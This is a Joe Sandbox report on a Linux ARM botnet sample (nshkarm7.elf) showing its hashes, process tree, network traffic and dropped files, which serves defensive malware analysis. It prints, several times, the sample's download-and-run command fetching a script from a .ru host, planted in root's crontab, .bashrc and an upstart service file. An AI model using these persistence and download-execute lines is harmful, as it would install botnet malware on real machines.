Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
nshkarm7.elf

Overview

General Information

Sample name:nshkarm7.elf
Analysis ID:1576956
MD5:a6fb371be815f7cae6efa49d7e910f27
SHA1:8dc853770df8f5936055e4c93608c82b66b7fd05
SHA256:fab0eb14b73a711652d460c3f9091b76d4d99372d0e53ae5643358a5743f6e32
Tags:elfuser-abuse_ch
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions
Sample tries to persist itself using cron
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1576956
Start date and time:2024-12-17 19:32:08 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 47s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:nshkarm7.elf
Detection:MAL
Classification:mal64.troj.linELF@0/3@13/0
  • VT rate limit hit for: nshkarm7.elf
Command:/tmp/nshkarm7.elf
PID:5425
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
you are now apart of hail cock botnet
Standard Error:no crontab for root
/bin/sh: 1: /sbin/initctl: not found
  • system is lnxubuntu20
  • nshkarm7.elf (PID: 5425, Parent: 5347, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/nshkarm7.elf
    • sh (PID: 5427, Parent: 5425, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      • sh New Fork (PID: 5429, Parent: 5427)
        • sh New Fork (PID: 5431, Parent: 5429)
        • crontab (PID: 5431, Parent: 5429, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
      • sh New Fork (PID: 5430, Parent: 5427)
      • crontab (PID: 5430, Parent: 5427, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
    • sh (PID: 5432, Parent: 5425, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "/sbin/initctl start bot"
      • sh New Fork (PID: 5434, Parent: 5432)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: nshkarm7.elfReversingLabs: Detection: 18%
Source: tmp.H9DAoO.19.drString: @reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: .bashrc.12.drString: cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
Source: bot.conf.12.drString: exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh

Networking

barindex
Source: global trafficTCP traffic: 212.64.215.71 ports 17662,24117,1,2,6,7,14302,20060
Source: global trafficTCP traffic: 192.168.2.13:50290 -> 212.64.215.71:17662
Source: global trafficTCP traffic: 192.168.2.13:46544 -> 80.78.26.121:21952
Source: /tmp/nshkarm7.elf (PID: 5425)Socket: 127.0.0.1:1172Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 202.61.197.122
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 178.254.22.166
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 139.84.165.176
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 168.235.111.72
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 51.158.108.203
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 5.161.109.23
Source: unknownUDP traffic detected without corresponding DNS query: 185.181.61.24
Source: unknownUDP traffic detected without corresponding DNS query: 137.220.52.23
Source: unknownUDP traffic detected without corresponding DNS query: 80.152.203.134
Source: unknownUDP traffic detected without corresponding DNS query: 81.169.136.222
Source: unknownUDP traffic detected without corresponding DNS query: 194.36.144.87
Source: global trafficDNS traffic detected: DNS query: kingstonwikkerink.dyn
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: bot.conf.12.drString found in binary or memory: http://hailcocks.ru/wget.sh;
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal64.troj.linELF@0/3@13/0

Persistence and Installation Behavior

barindex
Source: /bin/sh (PID: 5431)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
Source: /bin/sh (PID: 5430)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
Source: /tmp/nshkarm7.elf (PID: 5425)File written: /root/.bashrcJump to behavior
Source: /usr/bin/crontab (PID: 5430)File: /var/spool/cron/crontabs/tmp.H9DAoOJump to behavior
Source: /usr/bin/crontab (PID: 5430)File: /var/spool/cron/crontabs/rootJump to behavior
Source: /tmp/nshkarm7.elf (PID: 5425)File: /root/.bashrcJump to behavior
Source: /tmp/nshkarm7.elf (PID: 5427)Shell command executed: /bin/sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"Jump to behavior
Source: /tmp/nshkarm7.elf (PID: 5432)Shell command executed: /bin/sh -c "/sbin/initctl start bot"Jump to behavior
Source: submitted sampleStderr: no crontab for root/bin/sh: 1: /sbin/initctl: not found: exit code = 0
Source: /tmp/nshkarm7.elf (PID: 5425)Queries kernel information via 'uname': Jump to behavior
Source: nshkarm7.elf, 5425.1.00007fff538f1000.00007fff53912000.rw-.sdmp, nshkarm7.elf, 5435.1.00007fff538f1000.00007fff53912000.rw-.sdmp, nshkarm7.elf, 5479.1.00007fff538f1000.00007fff53912000.rw-.sdmpBinary or memory string: >x86_64/usr/bin/qemu-arm/tmp/nshkarm7.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/nshkarm7.elf
Source: nshkarm7.elf, 5425.1.00005634f9aa1000.00005634f9c17000.rw-.sdmp, nshkarm7.elf, 5435.1.00005634f9aa1000.00005634f9c17000.rw-.sdmp, nshkarm7.elf, 5479.1.00005634f9aa1000.00005634f9c17000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: nshkarm7.elf, 5425.1.00007fff538f1000.00007fff53912000.rw-.sdmp, nshkarm7.elf, 5435.1.00007fff538f1000.00007fff53912000.rw-.sdmp, nshkarm7.elf, 5479.1.00007fff538f1000.00007fff53912000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: nshkarm7.elf, 5479.1.00007fff538f1000.00007fff53912000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: nshkarm7.elf, 5425.1.00005634f9aa1000.00005634f9c17000.rw-.sdmp, nshkarm7.elf, 5435.1.00005634f9aa1000.00005634f9c17000.rw-.sdmp, nshkarm7.elf, 5479.1.00005634f9aa1000.00005634f9c17000.rw-.sdmpBinary or memory string: 4V!/etc/qemu-binfmt/arm
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information2
Scripting
Valid Accounts1
Scheduled Task/Job
1
Unix Shell Configuration Modification
1
Unix Shell Configuration Modification
1
Hidden Files and Directories
OS Credential Dumping11
Security Software Discovery
Remote ServicesData from Local System1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Scheduled Task/Job
1
Scheduled Task/Job
RootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt2
Scripting
Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576956 Sample: nshkarm7.elf Startdate: 17/12/2024 Architecture: LINUX Score: 64 38 212.64.215.71, 14302, 17662, 20060 RACKSPACE-LONGB Turkey 2->38 40 kingstonwikkerink.dyn 80.78.26.121, 21952, 46544 CYBERDYNELR Cyprus 2->40 42 daisy.ubuntu.com 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Connects to many ports of the same IP (likely port scanning) 2->46 9 nshkarm7.elf 2->9         started        signatures3 process4 file5 36 /root/.bashrc, ASCII 9->36 dropped 52 Modifies the '.bashrc' or '.bash_profile' file typically for persisting actions 9->52 13 nshkarm7.elf sh 9->13         started        15 nshkarm7.elf sh 9->15         started        17 nshkarm7.elf 9->17         started        19 nshkarm7.elf 9->19         started        signatures6 process7 process8 21 sh crontab 13->21         started        25 sh 13->25         started        27 sh 15->27         started        29 nshkarm7.elf 17->29         started        file9 34 /var/spool/cron/crontabs/tmp.H9DAoO, ASCII 21->34 dropped 48 Sample tries to persist itself using cron 21->48 50 Executes the "crontab" command typically for achieving persistence 21->50 31 sh crontab 25->31         started        signatures10 process11 signatures12 54 Executes the "crontab" command typically for achieving persistence 31->54
SourceDetectionScannerLabelLink
nshkarm7.elf18%ReversingLabsLinux.Backdoor.Mirai
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    kingstonwikkerink.dyn
    80.78.26.121
    truefalse
      high
      NameSourceMaliciousAntivirus DetectionReputation
      http://hailcocks.ru/wget.sh;bot.conf.12.drfalse
        high
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        80.78.26.121
        kingstonwikkerink.dynCyprus
        37560CYBERDYNELRfalse
        212.64.215.71
        unknownTurkey
        15395RACKSPACE-LONGBtrue
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        80.78.26.121nshkarm5.elfGet hashmaliciousUnknownBrowse
          nshkarm.elfGet hashmaliciousUnknownBrowse
            212.64.215.71nshkarm5.elfGet hashmaliciousUnknownBrowse
              nshkarm.elfGet hashmaliciousUnknownBrowse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                daisy.ubuntu.comnshkarm5.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.25
                la.bot.arm.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.24
                la.bot.m68k.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.24
                la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                .i.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.25
                la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                hidakibest.arm6.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 162.213.35.24
                hidakibest.arm7.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 162.213.35.24
                kingstonwikkerink.dynnshkarm5.elfGet hashmaliciousUnknownBrowse
                • 80.78.26.121
                nshkarm.elfGet hashmaliciousUnknownBrowse
                • 80.78.26.121
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                RACKSPACE-LONGBnshkarm5.elfGet hashmaliciousUnknownBrowse
                • 212.64.215.71
                nshkarm.elfGet hashmaliciousUnknownBrowse
                • 212.64.215.71
                i686.elfGet hashmaliciousMiraiBrowse
                • 92.52.99.131
                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                • 89.234.28.7
                Josho.arm.elfGet hashmaliciousUnknownBrowse
                • 89.234.45.46
                https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                • 134.213.193.62
                meerkat.mips.elfGet hashmaliciousMiraiBrowse
                • 134.213.250.148
                sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                • 162.13.153.221
                teste.x86.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                • 92.52.99.126
                sora.mpsl.elfGet hashmaliciousMiraiBrowse
                • 89.234.45.54
                CYBERDYNELRnshkarm5.elfGet hashmaliciousUnknownBrowse
                • 80.78.26.121
                nshkarm.elfGet hashmaliciousUnknownBrowse
                • 80.78.26.121
                GjNVpV53SR.exeGet hashmaliciousQuasarBrowse
                • 80.78.28.83
                p-p.c-440.DUSK.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 185.193.127.129
                PhysXCooking64.dll.dllGet hashmaliciousBazar LoaderBrowse
                • 80.78.24.30
                FW3x3p4eZ5.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                • 80.78.24.30
                PhysXCooking64.dll.dllGet hashmaliciousBazar Loader, BruteRatelBrowse
                • 80.78.24.30
                na.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 185.193.127.129
                na.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 185.193.127.129
                na.elfGet hashmaliciousGafgyt, MiraiBrowse
                • 185.193.127.129
                No context
                No context
                Process:/tmp/nshkarm7.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):346
                Entropy (8bit):4.726559471748614
                Encrypted:false
                SSDEEP:6:SqEeZK8z7oXKqWFIw3CaXQw3cjICQDMFDKXsJovYL8jndFKXsJovFkTFdVOYHIaU:GeZfUX9HACcTSICQg+GABjnOGAFkROS2
                MD5:9722585F219A220A4DC2A0C49BD3B019
                SHA1:FFBA476658EA681147C570C6F2B16A79E7D38E19
                SHA-256:BB41836A1F2E11795C52739E7434247D90C0F8D391AFE759598BAA06E3657A8D
                SHA-512:77F16A70995A2650A397661D7B9CE3A83F4A5C01DC6EBC5E02B60A41D425246D37AB49478DC38EE3FC956775D90E9C86F911E0AC5E5DF6E142BCC82F8601D6E4
                Malicious:false
                Reputation:low
                Preview:# bot - My Miscellaneous Service.description "My Miscellaneous Service".start on filesystem or runlevel [2345].stop on runlevel [!2345].script. exec cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.end script.post-start script. echo "Service Started".end script.
                Process:/tmp/nshkarm7.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):124
                Entropy (8bit):4.380927423351128
                Encrypted:false
                SSDEEP:3:aKVMFDEIGXjQJZWvYKQzQRFxFdljEIGXjQJZWv1SeDkiJCF9:DMFDKXsJovYL8jndFKXsJovFkTF9
                MD5:75D0F0790419BF1E1B797F768A7FD943
                SHA1:CB2B3673D8D5E7E9C6BE90C17EEE99EC7C005CC4
                SHA-256:118CC2B37583BC923A21CB5BEF6EC2E968E10886519A5614664BDE7C74628183
                SHA-512:1824A32B5178161E98599C3BD9186A52D5ED29B4BF727E3385550ABD4343DAEA43BD419DA51A11ADB958FCD0C43627C6070ECCDB480D033529FCB0AFB5A53CF1
                Malicious:true
                Reputation:low
                Preview:.cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                Process:/usr/bin/crontab
                File Type:ASCII text
                Category:dropped
                Size (bytes):306
                Entropy (8bit):5.1615299316907866
                Encrypted:false
                SSDEEP:6:SUrpqoqQjEOP1KmREJOBFQLvmuPIFwvZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jnd:8QjHig8SyIMeHLUHYC+GABjnOGAFkz
                MD5:46E51B1789A67F4FA31BFB1B0FA97F83
                SHA1:FA7EB2DACA25437E74CF29E05D52C39AF28718E7
                SHA-256:180871543CC4C4BDF3DE5CFC219C058D76E41B79F7D9BAE3B24494053AADAD14
                SHA-512:62A4671F22668BCA489D6015B53C54376B52BACBD156D020AE68F6BCE1D440DA12644031A450D906AFB1FD4218F0317ECC49C12152C51670E65C735D862462E4
                Malicious:true
                Reputation:low
                Preview:# DO NOT EDIT THIS FILE - edit the master and reinstall..# (- installed on Tue Dec 17 12:32:58 2024).# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $).@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh.
                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.178427477903329
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:nshkarm7.elf
                File size:102'512 bytes
                MD5:a6fb371be815f7cae6efa49d7e910f27
                SHA1:8dc853770df8f5936055e4c93608c82b66b7fd05
                SHA256:fab0eb14b73a711652d460c3f9091b76d4d99372d0e53ae5643358a5743f6e32
                SHA512:3518e497c79291ba5ca02af77230af4a4b9cd3109c3fe5c09f07045cea996c1b14841ecc26422399caf51536a0c0d45be6e9e69304488df466804a2842e8be63
                SSDEEP:3072:LofHmAA6qOI8a2dz4tN48LCIBe3QwP7zjGX:yHm6y8a2dz4tNhCIKQc7fGX
                TLSH:65A31946B9819F11D4D631FAFB9E414933536FBCE3FA7101D920AFA4238A9DB0E72512
                File Content Preview:.ELF..............(.........4...........4. ...(........p${..$...$... ... ...........................D|..D|..............D|..D|..D|.......a..............H|..H|..H|..................Q.td..................................-...L..................@-.,@...0....S

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:ARM
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x8194
                Flags:0x4000002
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:5
                Section Header Offset:101792
                Section Header Size:40
                Number of Section Headers:18
                Header String Table Index:17
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80d40xd40x100x00x6AX004
                .textPROGBITS0x80f00xf00x162e40x00x6AX0016
                .finiPROGBITS0x1e3d40x163d40x100x00x6AX004
                .rodataPROGBITS0x1e3e80x163e80x17240x00x2A008
                .ARM.extabPROGBITS0x1fb0c0x17b0c0x180x00x2A004
                .ARM.exidxARM_EXIDX0x1fb240x17b240x1200x00x82AL204
                .eh_framePROGBITS0x27c440x17c440x40x00x3WA004
                .tbssNOBITS0x27c480x17c480x80x00x403WAT004
                .init_arrayINIT_ARRAY0x27c480x17c480x40x00x3WA004
                .fini_arrayFINI_ARRAY0x27c4c0x17c4c0x40x00x3WA004
                .jcrPROGBITS0x27c500x17c500x40x00x3WA004
                .gotPROGBITS0x27c540x17c540xac0x40x3WA004
                .dataPROGBITS0x27d000x17d000x22c0x00x3WA004
                .bssNOBITS0x27f2c0x17f2c0x5f140x00x3WA004
                .commentPROGBITS0x00x17f2c0xdcc0x00x0001
                .ARM.attributesARM_ATTRIBUTES0x00x18cf80x160x00x0001
                .shstrtabSTRTAB0x00x18d0e0x910x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                EXIDX0x17b240x1fb240x1fb240x1200x1204.48220x4R 0x4.ARM.exidx
                LOAD0x00x80000x80000x17c440x17c446.14480x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                LOAD0x17c440x27c440x27c440x2e80x61fc4.10280x6RW 0x8000.eh_frame .tbss .init_array .fini_array .jcr .got .data .bss
                TLS0x17c480x27c480x27c480x00x80.00000x4R 0x4.tbss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                TimestampSource PortDest PortSource IPDest IP
                Dec 17, 2024 19:33:04.787271023 CET5029017662192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:04.907394886 CET1766250290212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:04.907702923 CET5029017662192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:04.907704115 CET5029017662192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:05.029304028 CET1766250290212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:05.029516935 CET5029017662192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:05.149674892 CET1766250290212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:07.223470926 CET1766250290212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:07.223877907 CET5029017662192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:07.349916935 CET1766250290212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:12.547522068 CET4495020060192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:12.670747995 CET2006044950212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:12.670972109 CET4495020060192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:12.670972109 CET4495020060192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:12.791090965 CET2006044950212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:12.791383982 CET4495020060192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:12.912580013 CET2006044950212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:15.012276888 CET2006044950212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:15.012660980 CET4495020060192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:15.132399082 CET2006044950212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:25.264139891 CET5309624117192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:25.387263060 CET2411753096212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:25.387494087 CET5309624117192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:25.387603045 CET5309624117192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:25.510857105 CET2411753096212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:25.511224031 CET5309624117192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:25.636442900 CET2411753096212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:27.685475111 CET2411753096212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:27.685842991 CET5309624117192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:27.805834055 CET2411753096212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:38.015573978 CET4381014302192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:38.142597914 CET1430243810212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:38.143029928 CET4381014302192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:38.143229008 CET4381014302192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:38.262986898 CET1430243810212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:38.263389111 CET4381014302192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:38.383207083 CET1430243810212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:40.460333109 CET1430243810212.64.215.71192.168.2.13
                Dec 17, 2024 19:33:40.460833073 CET4381014302192.168.2.13212.64.215.71
                Dec 17, 2024 19:33:40.580665112 CET1430243810212.64.215.71192.168.2.13
                Dec 17, 2024 19:34:00.727385998 CET4654421952192.168.2.1380.78.26.121
                Dec 17, 2024 19:34:00.847743034 CET219524654480.78.26.121192.168.2.13
                Dec 17, 2024 19:34:00.848061085 CET4654421952192.168.2.1380.78.26.121
                Dec 17, 2024 19:34:00.848138094 CET4654421952192.168.2.1380.78.26.121
                Dec 17, 2024 19:34:00.967911005 CET219524654480.78.26.121192.168.2.13
                Dec 17, 2024 19:34:00.968218088 CET4654421952192.168.2.1380.78.26.121
                Dec 17, 2024 19:34:01.088720083 CET219524654480.78.26.121192.168.2.13
                Dec 17, 2024 19:34:10.858508110 CET4654421952192.168.2.1380.78.26.121
                Dec 17, 2024 19:34:10.978391886 CET219524654480.78.26.121192.168.2.13
                Dec 17, 2024 19:34:11.283338070 CET219524654480.78.26.121192.168.2.13
                Dec 17, 2024 19:34:11.283718109 CET4654421952192.168.2.1380.78.26.121
                TimestampSource PortDest PortSource IPDest IP
                Dec 17, 2024 19:32:59.519797087 CET4908653192.168.2.1351.158.108.203
                Dec 17, 2024 19:32:59.695741892 CET4851153192.168.2.1351.158.108.203
                Dec 17, 2024 19:33:04.526390076 CET4531953192.168.2.13185.181.61.24
                Dec 17, 2024 19:33:04.702385902 CET5403953192.168.2.13185.181.61.24
                Dec 17, 2024 19:33:04.786268950 CET5345319185.181.61.24192.168.2.13
                Dec 17, 2024 19:33:04.962357998 CET5354039185.181.61.24192.168.2.13
                Dec 17, 2024 19:33:04.964413881 CET4136153192.168.2.1381.169.136.222
                Dec 17, 2024 19:33:05.205652952 CET534136181.169.136.222192.168.2.13
                Dec 17, 2024 19:33:05.207324982 CET4977953192.168.2.1351.158.108.203
                Dec 17, 2024 19:33:12.227210999 CET5752853192.168.2.13168.235.111.72
                Dec 17, 2024 19:33:12.546765089 CET5357528168.235.111.72192.168.2.13
                Dec 17, 2024 19:33:14.218019009 CET5392253192.168.2.13185.181.61.24
                Dec 17, 2024 19:33:14.478734016 CET5353922185.181.61.24192.168.2.13
                Dec 17, 2024 19:33:14.480115891 CET4524053192.168.2.13202.61.197.122
                Dec 17, 2024 19:33:14.728774071 CET5345240202.61.197.122192.168.2.13
                Dec 17, 2024 19:33:14.730101109 CET4661453192.168.2.13139.84.165.176
                Dec 17, 2024 19:33:19.736767054 CET3747653192.168.2.13168.235.111.72
                Dec 17, 2024 19:33:20.015755892 CET3771053192.168.2.13178.254.22.166
                Dec 17, 2024 19:33:20.046386003 CET5337476168.235.111.72192.168.2.13
                Dec 17, 2024 19:33:22.052341938 CET4991153192.168.2.1351.158.108.203
                Dec 17, 2024 19:33:25.022561073 CET4356653192.168.2.1381.169.136.222
                Dec 17, 2024 19:33:25.261657000 CET534356681.169.136.222192.168.2.13
                Dec 17, 2024 19:33:27.056473017 CET4648753192.168.2.135.161.109.23
                Dec 17, 2024 19:33:32.063046932 CET4426553192.168.2.13137.220.52.23
                Dec 17, 2024 19:33:32.689692974 CET4483053192.168.2.13139.84.165.176
                Dec 17, 2024 19:33:37.070118904 CET3585953192.168.2.1381.169.136.222
                Dec 17, 2024 19:33:37.311029911 CET533585981.169.136.222192.168.2.13
                Dec 17, 2024 19:33:37.696064949 CET4667753192.168.2.13168.235.111.72
                Dec 17, 2024 19:33:38.013082981 CET5346677168.235.111.72192.168.2.13
                Dec 17, 2024 19:33:40.318433046 CET4314253192.168.2.1381.169.136.222
                Dec 17, 2024 19:33:40.558940887 CET534314281.169.136.222192.168.2.13
                Dec 17, 2024 19:33:40.560430050 CET3657553192.168.2.1351.158.108.203
                Dec 17, 2024 19:33:45.464850903 CET4994853192.168.2.1351.158.108.203
                Dec 17, 2024 19:33:45.563132048 CET4090853192.168.2.13137.220.52.23
                Dec 17, 2024 19:33:50.472922087 CET4360053192.168.2.135.161.109.23
                Dec 17, 2024 19:33:50.570842981 CET3439853192.168.2.13185.181.61.24
                Dec 17, 2024 19:33:50.846132040 CET5334398185.181.61.24192.168.2.13
                Dec 17, 2024 19:33:55.480180025 CET4270553192.168.2.13137.220.52.23
                Dec 17, 2024 19:33:59.853331089 CET5154953192.168.2.1380.152.203.134
                Dec 17, 2024 19:34:00.486572981 CET4116653192.168.2.1381.169.136.222
                Dec 17, 2024 19:34:00.725560904 CET534116681.169.136.222192.168.2.13
                Dec 17, 2024 19:34:04.858546972 CET4228353192.168.2.13194.36.144.87
